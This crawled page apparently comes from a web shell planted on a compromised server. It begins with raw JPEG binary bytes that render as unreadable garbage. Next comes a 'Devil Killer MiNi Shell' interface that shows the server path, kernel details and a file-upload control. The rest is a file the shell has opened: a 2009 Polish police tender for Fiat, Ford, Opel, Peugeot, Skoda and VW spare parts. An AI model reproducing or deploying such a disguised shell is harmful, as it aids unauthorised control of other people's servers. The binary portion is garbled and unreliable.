JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/23006-N-2009.html

<p class="kh_header"><b>Białystok: PRZETARG NIEOGRANICZONY NA DOSTAWĘ CZĘŚCI ORYGINALNYCH LUB O PORÓWNYWALNEJ JAKOŚCI DO SAMOCHODÓW MARKI FIAT, FORD, OPEL, PEUGEOT, SKODA, VW (postępowanie nr 3/S/09)</b><br>
<b>Numer ogłoszenia: 23006 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Białymstoku , ul. Sienkiewicza 65, 15-003 Białystok, woj. podlaskie, tel. 085 6773137, faks 085 6772842.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podlaska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZETARG NIEOGRANICZONY NA DOSTAWĘ CZĘŚCI ORYGINALNYCH LUB O PORÓWNYWALNEJ JAKOŚCI DO SAMOCHODÓW MARKI FIAT, FORD, OPEL, PEUGEOT, SKODA, VW (postępowanie nr 3/S/09).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa części zamiennych (oryginalnych lub o porównywalnej jakości/ równoważnych) do samochodów marki Fiat, Ford, Opel, Peugeot, Skoda, VW.
Przez oryginalne części zamienne Zamawiający rozumie części odpowiadające warunkom określonym § 2 pkt. 20 Rozporządzenia Rady Ministrów z dnia 28 stycznia 2003 r. w sprawie wyłączenia określonych porozumień wertykalnych w sektorze pojazdów samochodowych spod zakazu porozumień ograniczających konkurencję (Dz. U. z 06.03.2003 r., Nr 38, poz. 329). Zgodnie z klasyfikacją GVO są to: części zamienne producenta pojazdów z jego logo lub części zamienne wyprodukowane przez producenta dostarczającego dane części na pierwszy montaż samochodów firmowane jego logo.
Przez części zamienne o porównywalnej jakości Zamawiający rozumie części odpowiadające warunkom określonym § 2 pkt. 21 Rozporządzenia Rady Ministrów z dnia 28 stycznia 2003 r. w sprawie wyłączenia określonych porozumień wertykalnych w sektorze pojazdów samochodowych spod zakazu porozumień ograniczających konkurencję (Dz. U. z 06.03.2003 r., Nr 38, poz. 329). Zgodnie z klasyfikacją GVO są to: części zamienne posiadające zaświadczenie producenta, że dana część jest tej samej jakości co komponenty, które są lub były stosowane do montażu danych pojazdów samochodowych.

Kod CPV: 
	
34300000	Części i akcesoria do pojazdów i silników do nich

Zadanie nr 1
Przedmiotem zamówienia jest dostawa części zamiennych do samochodów marki Fiat.
Stilo 1,9 TDI 2006 r. nr VIN ZFA19200000640488, Filtr kabinowy	SZT	8,	Filtr oleju	SZT	8,	Klocki hamulcowe przód	kpl	6, Klocki hamulcowe tył	kpl	6,	Łącznik stabilizatora	SZT	10,	Pompa oleju	SZT	1,	Tarcze hamulcowe przód	SZT	6,	Tarcze hamulcowe tył	SZT	6,	Uszczelniacz półosi lewy	SZT	6,	Uszczelniacz półosi prawy 	SZT	6,	Wkład filtra powietrza	SZT	8, BRAWA 1.6 IE 1998 r. nr VIN ZFA18200004645869,	Alternator	SZT	1,	Amortyzator przedni	SZT	2,	Amortyzator tylny	SZT	2,	Cylinderek hamulcowy tył	SZT	3,	Filtr oleju	SZT	3,	Katalizator	SZT	1,	Klocki hamulcowe	KPL	3,	Linka hamulca ręcznego lewa	SZT	1,	Linka hamulca ręcznego prawa	SZT	1,	Łącznik stabilizatora	SZT	4,	Łożysko paska rozrządu	SZT	2,	Napinacz paska rozrządu	SZT	2,	Pasek klinowy 	SZT	3,	pasek rozrządu	SZT	2,	Piasta koła tylnego	SZT	3,	Przegub zewnętrzny	SZT	3,	Rozrusznik	SZT	1,	Sprzęgło kompletne	SZT	1,	Tarcza hamulcowa	SZT	4,	Termostat	SZT	2,	Tulejka łącznika stabilizatora	SZT	6,	Wahacz przedni lewy	SZT	2,	Wahacz przedni prawy	SZT	2,	Wiązka przewodów zapł.	KPL	3,	Wkład filtr powietrza	SZT	3,	Zestaw naprawczy wahacza tylnego	SZT	4,	Inne części nie wymienione w tabeli do pojazdów marki jw. stanowiące 30% wartości wszystkich części wymienionych w tabeli. 
Zadanie nr 2
Przedmiotem zamówienia jest dostawa części zamiennych do samochodów marki Ford.
Transit 2,0 1997r. 114 KM Nr VIN WFOLXXGGVLVC91498, 
Amortyzator przedni	SZT.	4,	Amortyzator tylny	SZT.	2,	Cylinderek tylny	SZT.	5,	Filtr oleju	SZT.	10,	Klocki hamulcowe	KPL	5,	Końcówka drążka kierowniczego	SZT.	5,	Końcówka wahacza	SZT.	5,	Kpl wkładek zamka	SZT.	1,	Krzyżak wału	SZT.	2,	Linka hamulca ręcznego	SZT.	3,	Łożyska piasty przedniej	SZT.	10,	Łożysko podpory wału	SZT.	5,	Łożysko wyciskowe	SZT.	2,	Nakładka pedału hamulca	SZT.	5, Napinacz hydrauliczny	SZT.	2,	Pasek wieloklinowy	SZT.	10,	Poduszka silnika lewa	SZT.	2,	Poduszka silnika prawa	SZT.	2,	Pompa wodna	SZT.	1,	Prowadnica lańcucha	SZT.	2,	Prowadnica lańcucha dł	SZT.	2,	Przełącznik kierunków	SZT.	2,	Sprzęgło kpl.	SZT.	3,	Szczęki hamulcowe	KPL	5,	Ślizgacz napinacza	SZT.	2,	Tarcza hamulcowa	SZT.	10,	Tłumik końcowy	SZT.	4	Tuleja amortyzatora tylnego	SZT.	10,	Wkład filtra powietrza	SZT.	10,MONDEO 2,5 V6 24V 1998r 170KM nr VIN FOFXXGBBFWT48799,	Filtr oleju	SZT.	3,	Filtr przeciwpyłowy	SZT.	3,	Klocek hamulcowy przedni	KPL	3,	Klocek hamulcowy tylny	KPL	3,	Końcówka drążka kierowniczego lewa	SZT.	3,	Końcówka drążka kierowniczego prawa	SZT.	3, Linka hamulca ręcznego	SZT.	2,	Łożysko przedniej piasty	SZT.	4, Tarcza hamulcowa przód	SZT.	4,	Tarcza hamulcowa tył	SZT.	4,	Tłumik końcowy	SZT.	2,	Tuleja stabilizatora tył	SZT.	8,	Wkład filtra powietrza	SZT.	3
,	Inne części nie wymienione w tabeli do pojazdów marki jw. stanowiące 30% wartości wszystkich części wymienionych w tabeli,

Zadanie nr 3
Przedmiotem zamówienia jest dostawa części zamiennych do samochodów marki Opel.
OPEL ASTRA 1,6 2005r 103KM nr VIN WOLOTGF486G000161,
	Amortyzator przód	SZT	10,	Amortyzator tył	SZT	10
,	Automat rozrusznika	SZT	6,	Cewka zapłonowa	SZT	4,	Cylinderek hamulca ręcznego	SZT	10, 	Drążek kierowniczy	SZT	10,	Filtr kabinowy	SZT	40,	Halogen lewy	SZT	6,	Halogen prawy	SZT	6,	Klocki hamulcowe przód	KPL	40,	Końcówka drążka kierowniczego	SZT	30,	Łącznik stabilizatora	SZT	60,	Mocowanie listwy progowej	SZT	20,	Pasek rozrządu	SZT	30,	Piasta koła kpl przód	SZT	40,	piasta koła tył ABS	SZT	30,	Pióro wycieraczki 480mm	SZT	60,	Pióro wycieraczki 500mm	SZT	60,	Pióro wycieraczki tył 	SZT	20,	Pompa wodna	SZT	4,	Przegub napędowy zewn.	SZT	10,	Rolka nap. pasek rozrządu	SZT	20,	Rolka prowadząca pasek rozrządu	SZT	20,	Rolka zwrotna paska rozrządu	SZT	20,	Rozrusznik	SZT	2,	Sprężyna zawieszenia przód	SZT	20,	Sprężyna zawieszenia tył 	SZT	20,	Sprzęgło kpl	SZT	10,	Szczęki hamulcowe	KPL	10,	Tarcza hamulcowa	SZT	40,	Termostat	SZT	4,	Tłumik środkowy	SZT	10,	Tłumik tylny	SZT	10,	Tuleja drążka stabilizatora przód	SZT	50,	Wkład filtra powietrza	SZT	60,	Zawór regulacji spalin	SZT	1,
OPEL VIVARO 2,5CDTI 2005 r. 136KM nr VIN WOLF7ADA66V604966,
	Amortyzator tylny	SZT	10,	Cylinderek sprzęgła	SZT	8,	Drążek kierowniczy	SZT	10,	Drążek stabilizatora	SZT	2,	Filtr oleju	SZT	20,	Filtr paliwa  	SZT	10,	Klocki hamulcowe przód	KPL	20,	Klocki hamulcowe tył	KPL	20,	Końcówka drążka kierowniczego lewa	SZT	20,	Końcówka drążka kierowniczego prawa	SZT	20,	Linki zmiany biegów	KPL	2,	Łącznik stabilizatora	SZT	40,	Pasek rozrządu	SZT	10,	Pasek wieloklinowy	SZT	20,	Pióra wycieraczek	SZT	20,	Poduszka tylna zawieszenia silnika	SZT	10,	Przepływomierz powietrza	SZT	4,	Rolka nap. rozrządu	SZT	10,	Rolka prowadząca pasek rozrządu	SZT	10,	Sprzęgło kpl	SZT	8, Sworzeń wahacza	SZT	10, 	Tarcza hamulcowa przód	SZT	16, 	Tarcza hamulcowa tył	SZT	20, 	Wkład filtra powietrza	SZT	30
,	Zawór regulacji spalin	SZT	4, OPEL VECTRA 1,9 CDTI 2005r 150KM nr VIN WOLOZCF6961033237 , 	Amortyzator tył	SZT	4, 	Filtr kabinowy	SZT	4, 	Filtr paliwa	SZT	4, 	Klocki hamulcowe przód	KPL	4, 	Klocki hamulcowe tył	KPL	4, 	Łącznik stabilizatora	SZT	6, 	Piasta koła kpl. tył	SZT	4, 	Pióra wycieraczek przód	SZT	8, 	Rolka napinająca pasek rozrządu	SZT	4, 	Rolka prowadząca paska rozrządu	SZT	4, 	Rolka zwrotna paska rozrządu	SZT	4
,	Tarcza hamulcowa tył	SZT	6, 	Wkład filtra oleju	SZT	4, 	Wkład filtra powietrza powietrza	SZT	4, 	Wtryskiwacz 	SZT	4, 	Inne części nie wymienione w tabeli do pojazdów marki jw. stanowiące 30% wartości wszystkich części wymienionych w tabeli, 

Zadanie nr 4
Przedmiotem zamówienia jest dostawa części zamiennych do samochodów marki Peugeot.
Peugeot 307 1,6 V16 2005r 109KM nr VIN VF33CNFUL84382983, 
	Cewka zapłonowa	SZT	3, 	Drążek kierowniczy	SZT	10,	Filtr Kabinowy	SZT	12, 	Filtr oleju	SZT	12,	Klocki hamulcowe przód	KPL	11, 	Klocki hamulcowe tył	KPL	11,	Końcówka drążka kierowniczego	SZT	10,	Łącznik stabilizatora	SZT	20, 	Napinacz paska rozrządu	SZT	11,	Pasek rozrządu	SZT	11, 	Poduszka silnika prawa	SZT	4,	Pompa oleju	SZT	2, 	Rolka prowadząca paska rozrządu	SZT	11, 	Sprzęgło kpl.	SZT	4, 	Tarcza hamulcowa przednia	SZT	14, 	Tarcza hamulcowa tylna	SZT	10,	Wkład filtra powietrza	SZT	12,	Zamek drzwi przednich	SZT	2, 	Inne części nie wymienione w tabeli do pojazdu marki jw. stanowiące 30% wartości wszystkich części wymienionych w tabeli		

Zadanie nr 5
Przedmiotem zamówienia jest dostawa części zamiennych do samochodów marki Skoda.
SKODA FABIA 1.4 2002 r. 68KM nr VIN TMBDB16Y933674942, 
	Amortyzator przedni	SZT.	4, 	Amortyzator tylny	SZT.	4, 	Filtr kabinowy	SZT.	4, 	Filtr oleju	SZT.	8, 	Klocki hamulcowe	KPL	4, 	Łącznik stabilizatora	SZT.	10, Piasta przednia 	KPL	2, 	Rozrząd 	KPL	2, 	Szczęki hamulcowe	KPL	2,	Tarcza hamulcowa	SZT.	4, 	Termostat	SZT.	2, 	Tłumik środkowy	SZT.	1, 	Tłumik tylny	SZT.	2, 	Tulejka wahacz gruba tył	SZT.	8, 	Wkład filtra powietrza	SZT.	8, 	Inne części nie wymienione w tabeli do pojazdu marki jw. stanowiące 30% wartości wszystkich części wymienionych w tabeli,

Zadanie nr 6
Przedmiotem zamówienia jest dostawa części zamiennych do samochodów marki VW.
VW T-4 2.0i 1993 r. 84KM nr VIN WV2ZZZ70ZPH127657, 	Amortyzator przód	SZT	16, 	Amortyzator tył	SZT	8, Amortyzator układu kierowniczego	SZT	2, 	Automat rozrusznika	SZT	8, 	Cewka zapłonowa	KPL	8,	Cylinderek tył	SZT	16, 	Czujnik ciśnienia oleju - biały	SZT	10, 	Czujnik ciśnienia oleju - brązowy	SZT	10, Czujnik temperatury wody czterostykowy	SZT	10, 	Czujnik temperatury wody dwustykowy	SZT	10,	Drążek kierowniczy lewy nkpl	SZT	24,	Drążek kierowniczy prawy nkpl	SZT	24,	Dźwignia pośrednia zmiany biegów	SZT	3,	Filtr kabinowy	SZT	20,	Filtr paliwa	SZT	16,	Grzejnik nagrzewnicy	SZT	3,	Klocki hamulcowe	KPL	15,	Końcówka drążka kierowniczego lewa	SZT	20,	Końcówka drążka kierowniczego prawa	SZT	20,	Kopułka aparatu zapłonowego	SZT	12,	Korbka podnoszenia szyby	SZT	20,	Korek spustu oleju	SZT	6,	Korek zbiornika wyrównawczego	SZT	8,	Lampka oświetlająca tablice rej	SZT	10,	Linka gazu	SZT	4,	Linka hamulca ręcznego	SZT	10,	Linka sprzęgła	SZT	8,	Lusterko lewe kpl	SZT	2,	Lusterko prawe kpl.	SZT	2,	Łącznik stabilizatora	SZT	40,	Łożysko piasty przedniej	SZT	6,	Osłona drążka kierowniczego	SZT	10,	Osłona przegubu napędowego wewnętrznego	SZT	16,	Osłona przegubu napędowego zewnętrznego	SZT	24,	Palec rozdzielacza	SZT	8,	Pasek klinowy 	SZT	30,	Pasek zębaty rozrządu	SZT	14,	Pióro wycieraczki	SZT	70,	Poduszka skrzyni biegów	SZT	8,	Pompa paliwa  	SZT	6,	Pompa wodna	SZT	6,	Pompa wody kpl.	SZT	2,	Przegub napędowy wewnętrzny	SZT	8,	Przegub napędowy zewnętrzny	SZT	18,	Przegub wahacza dolnego	SZT	26,	Przegub wahacza górnego	SZT	16,	Regulacja powietrza	SZT	1,	Regulator napięcia	SZT	10,	Rura wydechowa przednia	SZT	8,	Silnik dmuchawy	SZT	1,	Sprężyna zawieszenia tylna	SZT	12,	Sprzęgło kpl	SZT	2,	Szczęki hamulcowe	KPL	8,	Śruba mocowania przegubu	KPL	16,	Śruba naciągu alternatora	SZT	6,	Tarcza hamulcowa	SZT	16,	Termostat wody	SZT	8,	Tłumik końcowy	SZT	6,	Tłumik środkowy	SZT	6,	Tuleja wahacza przedniego przednia	SZT	16,	Tuleja wahacza przedniego tylna	SZT	30,	Tulejka drążka stabilizatora	SZT	40,	Uszczelka drzwi przednia prawa	SZT	4,	Uszczelka pokrywy zaworów	SZT	30,	Uszczelniacz przedni wału korbowego	SZT	10,	Uszczelniacz zaworu	SZT	64,	Wieszak gumowy tłumika	SZT	16,	Wkład filtra powietrza	SZT	20,	Włącznik nawiewu	SZT	6,	Włącznik świateł głównych	SZT	3,	Zamek schowka	SZT	5,VW 2.5 TDI 75KW 2001r. Nr VIN WV1ZZZ70Z1X101128,	Blokada szyby przesuwnej	SZT	15,	Filtr oleju	SZT	25,	Filtr paliwa	SZT	25,	Klocki hamulcowe przednie	KPL	30,	Klocki hamulcowe tylne	KPL	20,	Koło pasowe wału	SZT	6,	Końcówka  kierownicy lewa	SZT	25,	Końcówka kierownicy prawa	SZT	25,	Łożysko hydrauliczne sprzęgła	SZT	5,	Napinacz dolny paska pompy wtryskowej	SZT	10,	Napinacz górny paska pompy wtryskowej	SZT	10,	Pasek pompy wtrysk.	SZT	10,	Pasek rozrządu	SZT	10,	Pióro wycieraczki	SZT	70,	Pompa sprzęgłowa	SZT	5,	Pompa wody	SZT	8,Przegub napędowy wewnętrzny	SZT	4,	Przegub napędowy zewnętrzny	SZT	30,	Przepływomierz powietrza	SZT	10,	Rolka napinająca paska rozrządu	SZT	10,	Rozrusznik	SZT	2,	Sewro	SZT	2,	Sprzęgło kpl z kołem dwumasowym	SZT	2,	Sprzęgło kpl	SZT	5,	Sworzeń wahacza dolnego	SZT	40,	Sworzeń wahacza górnego	SZT	20,	Tarcza hamulcowa przód	SZT	20,	Tarcza hamulcowa tył	SZT	20,	Tłumik tylny	SZT	6,	Tuleja wahacza przedniego przednia	SZT	40,	Turbosprężarka	KPL	1,	Wkład filtra powietrza	SZT	30,	Włącznik świateł stop	SZT	10,	Inne części nie wymienione w tabeli do pojazdów marki jw. stanowiące 30% wartości wszystkich części wymienionych w tabeli

Zamawiający dopuszcza składanie ofert częściowych. 
Pod pojęciem oferty częściowej Zamawiający rozumie dostawę całego asortymentu w zakresie zadania nr 1, zadania nr 2, zadania nr 3, zadania nr 4, zadania nr 5 lub zadania nr 6.
Wykonawca dowolnie wybiera zadania, które może zrealizować i wypełnia odpowiednie załączniki (1A-1F) SIWZ

Szacunkowa wartość zamówienia (netto) dla zamówienia udzielanego w częściach: 512. 503,39 zł netto 132.187,30 euro, w tym szacunkowa wartość zamówienia 205.126,36zł netto, 52.907,16 euro..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2007r., Nr 223, poz. 1655 z późń. zm.), tzn.:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
Zgodnie z  art. 24 ust. 1 ustawy Prawo zamówień publicznych, z postępowania o udzielenie zamówienia wyklucza się Wykonawców:
a)	którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania;
b)	w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego; 
c)	którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
d)	osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
e)	spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
f)	spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
g)	spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
h)	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
i)	podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
j)	wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt  1-3 w/w ustawy.
Na podstawie art. 24 ust. 2 ustawy Pzp z postępowania o udzielenie zamówienia wykluczy się również Wykonawców, którzy:
a)	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; 
b)	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
c)	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3;
d)	nie wnieśli wadium, jeśli jest wymagane, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.
Dokumenty potwierdzające, że Wykonawca posiada uprawnienia do wykonywania określonej działalności oraz nie podlega wykluczeniu muszą zostać złożone odrębnie przez każdego ze wspólników spółki cywilnej - dokumenty określone w pkt IV ppkt 3 specyfikacji istotnych warunków zamówienia. Koncesja, zezwolenie lub licencja, jeżeli jest wymagana, rozpatrywana będzie łącznie. Potencjał techniczny i finansowy wspólników spółki cywilnej będzie rozpatrywany łącznie. 
Nie złożenie przez któregokolwiek ze wspólników spółki cywilnej w/w dokumentów skutkować będzie wykluczeniem z postępowania spółki cywilnej, z zastrzeżeniem art. 26 ust. 3 ustawy PZP.   
